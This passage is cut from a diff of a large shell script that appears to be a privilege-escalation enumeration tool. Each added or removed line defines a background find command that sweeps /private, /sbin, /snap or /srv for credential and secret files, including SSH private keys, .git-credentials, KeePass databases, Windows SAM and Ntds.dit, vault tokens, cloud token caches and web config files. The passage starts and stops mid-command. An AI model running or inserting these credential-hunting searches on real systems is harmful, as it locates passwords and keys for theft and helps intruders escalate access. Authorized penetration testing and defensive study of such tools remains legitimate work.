\"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_PRIVATE=`eval_bckgrd "find /private -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"agent*\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"sess_*\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_RUN=`eval_bckgrd "find /run -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SBIN=`eval_bckgrd "find /sbin -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SNAP=`eval_bckgrd "find /snap -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SRV=`eval_bckgrd "find /srv -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SBIN=`eval_bckgrd "find /sbin -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o 